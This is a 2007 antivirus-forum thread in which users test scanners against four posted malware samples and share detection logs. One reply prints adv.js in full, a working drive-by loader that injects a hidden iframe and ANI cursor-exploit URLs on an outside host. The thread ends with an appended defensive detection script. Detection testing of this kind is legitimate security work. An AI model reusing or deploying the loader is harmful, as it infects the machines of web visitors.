[Virus samples] Four more~~

tonger2003
Posted on 2007-4-7 01:22:46
小邪邪
Posted on 2007-4-7 01:26:00
AVK catches all of them
欠妳緈諨
Posted on 2007-4-7 01:33:08
avast! missed the second one; the other three triggered an alert as soon as they were downloaded

The EQs
Posted on 2007-4-7 01:33:34

Missed one

Scan performed at: 2007-4-7 1:33:49
Scanning Log
NOD32 version 2171 (20070406) NT
Command line: C:\Documents and Settings\EQ2\桌面\muxiao2.rar C:\Documents and Settings\EQ2\桌面\0.rar C:\Documents and Settings\EQ2\桌面\adv.rar C:\Documents and Settings\EQ2\桌面\muxiao1.rar
Operating memory - is OK

Date: 7.4.2007  Time: 01:33:52
Anti-Stealth technology is enabled.
Scanned disks, folders and files: C:\Documents and Settings\EQ2\桌面\muxiao2.rar; C:\Documents and Settings\EQ2\桌面\0.rar; C:\Documents and Settings\EQ2\桌面\adv.rar; C:\Documents and Settings\EQ2\桌面\muxiao1.rar
C:\Documents and Settings\EQ2\桌面\muxiao2.rar ?RAR ?muxiao2.jpg - a variant of Win32/TrojanDownloader.Ani.Gen trojan
C:\Documents and Settings\EQ2\桌面\0.rar ?RAR ?0.exe - Win32/Pacex.Gen virus
C:\Documents and Settings\EQ2\桌面\muxiao1.rar ?RAR ?muxiao1.jpg - a variant of Win32/TrojanDownloader.Ani.Gen trojan
Number of scanned files: 8
Number of threats found: 3
Number of files cleaned: 3
Time of completion: 01:33:53 Total scanning time: 1 sec (00:00:01)
欠妳緈諨
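Posted on 2007-4-7 01:35:13
I just switched back to avast! yesterday; it looks like the new version does passably in the samples section. Now I'm off to bed with the joy of victory.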
剑指七星
Posted on 2007-4-7 01:41:34
Missed the second one
已检测到: 病毒 Worm.Win32.Viking.ix        URL: http:/bbs.kafan.cn/attachment.php?aid=52940/0.exe
已检测到: 恶意程序 Exploit.Win32.IMG-ANI.k        URL:
已检测到: 恶意程序 Exploit.Win32.IMG-ANI.gen (修改)        URL:
mofunzone
Posted on 2007-4-7 02:06:18
Starting the file scan:

Begin scan in 'C:\Documents and Settings\morgan\My Documents\muxiao2.rar'
C:\Documents and Settings\morgan\My Documents\
  muxiao2.rar
    [0] Archive type: RAR
    --> muxiao2.jpg
        [DETECTION] Contains signature of the exploits EXP/Ani.Gen
        [WARNING]   Infected files in archives cannot be repaired!
        [WARNING]   The file was ignored!
Begin scan in 'C:\Documents and Settings\morgan\My Documents\0.rar'
C:\Documents and Settings\morgan\My Documents\
  0.rar
    [0] Archive type: RAR
    --> 0.exe
        [DETECTION] Is the Trojan horse TR/Crypt.NSPM.Gen
        [WARNING]   Infected files in archives cannot be repaired!
        [WARNING]   The file was ignored!
Begin scan in 'C:\Documents and Settings\morgan\My Documents\adv.rar'
C:\Documents and Settings\morgan\My Documents\
  adv.rar
    [0] Archive type: RAR
    --> adv.js
Begin scan in 'C:\Documents and Settings\morgan\My Documents\muxiao1.rar'
C:\Documents and Settings\morgan\My Documents\
  muxiao1.rar
    [0] Archive type: RAR
    --> muxiao1.jpg
        [DETECTION] Contains signature of the exploits EXP/Ani.Gen
        [WARNING]   Infected files in archives cannot be repaired!
        [WARNING]   The file was ignored!
mofunzone
Posted on 2007-4-7 02:07:17
Contents of adv.js; it pulls down those two ANI web trojans
// Read the object that carries the src
var v = document.getElementById("advjs");
// Read the parameter from the src
var u_num = getUrlParameterAdv("showmatrix_num",v.getAttribute('src'));

document.write("<iframe src=\"http://web.77276.com/1/"+u_num+".htm\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>");
document.writeln("<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.0 Transitional\/\/EN\">");
document.writeln("<HTML><HEAD>");
document.writeln("<META http-equiv=Content-Type content=\"text\/html; charset=big5\">");
document.writeln("<META content=\"MSHTML 6.00.2900.3059\" name=GENERATOR><\/HEAD>");
document.writeln("<BODY> ");
document.writeln("<DIV style=\"CURSOR: url(\'http:\/\/web.77276.com\/muxiao1.jpg\')\">");
document.writeln("<DIV ");
document.writeln("style=\"CURSOR: url(\'http:\/\/web.77276.com\/muxiao2.jpg\')\"><\/DIV><\/DIV><\/BODY><\/HTML>")

// Function that parses the parameters of the src
function getUrlParameterAdv(asName,lsURL){

loU = lsURL.split("?");
if (loU.length>1){

  var loallPm = loU[1].split("&");

  for (var i=0; i<loallPm.length; i++){
   var loPm = loallPm[i].split("=");
   if (loPm[0]==asName){
    if (loPm.length>1){
     return loPm[1];
    }else{
     return "";
    }
   }
  }
}
return null;
}
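
As an added example (not part of the thread and not any poster's code), a defender-side static triage of script text for the two patterns visible in the adv.js above: a zero-size iframe written into the page, and a CSS cursor loaded from a file that does not carry a cursor extension. The function names, rule names and the sample input with its placeholder host are constructed for illustration.

```javascript
// Added example: static triage for the two patterns in the posted adv.js.
// Rule names, function names and SAMPLE (placeholder host) are constructed.
const CURSOR_EXT = new Set(["cur", "ani"]);

const SAMPLE = String.raw`
document.write("<iframe src=\"http://host.invalid/1/"+n+".htm\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>");
document.writeln("<DIV style=\"CURSOR: url(\'http:\/\/host.invalid\/a.jpg\')\">");
document.writeln("<DIV style=\"cursor: url(\'pointer.cur\'), auto\">");
`;

// Undo JS string-literal escaping (\" \/ \') so markup hidden inside
// document.write() arguments can be matched. Coarse, but enough for triage.
function unescapeLiteral(text) {
  return text.replace(/\\(.)/g, "$1");
}

// True when the tag sets the given attribute to 0 (or 0px).
function isZero(tag, attr) {
  return new RegExp("\\b" + attr + "\\s*=\\s*[\"']?0(px)?\\b", "i").test(tag);
}

function triage(scriptText) {
  const text = unescapeLiteral(scriptText);
  const findings = [];
  // Rule 1: iframe with both width and height zero (invisible to the user).
  for (const m of text.matchAll(/<iframe\b[^>]*>/gi)) {
    if (isZero(m[0], "width") && isZero(m[0], "height")) {
      const src = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(m[0]);
      findings.push({ rule: "zero-size-iframe", url: src ? src[1] : null });
    }
  }
  // Rule 2: CSS cursor fetched from a file whose extension is not .cur/.ani,
  // e.g. a cursor served under an image name.
  for (const m of text.matchAll(/cursor\s*:\s*url\(\s*["']?([^"')\s]+)/gi)) {
    const path = m[1].split(/[?#]/)[0];
    const ext = path.includes(".") ? path.split(".").pop().toLowerCase() : "";
    if (!CURSOR_EXT.has(ext)) {
      findings.push({ rule: "cursor-from-non-cursor-file", url: m[1] });
    }
  }
  return findings;
}

console.log(triage(SAMPLE));
```

Because the iframe URL in such scripts is assembled by string concatenation, the reported `url` is only the literal prefix before the first closing quote.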
jlennon
Posted on 2007-4-7 03:09:26
The ANI ones can basically all be caught

KAV-Longhorn
Posted on 2007-4-7 08:31:04
Avira missed one; already reported it

Copyright © KaFan  KaFan.cn All Rights Reserved.
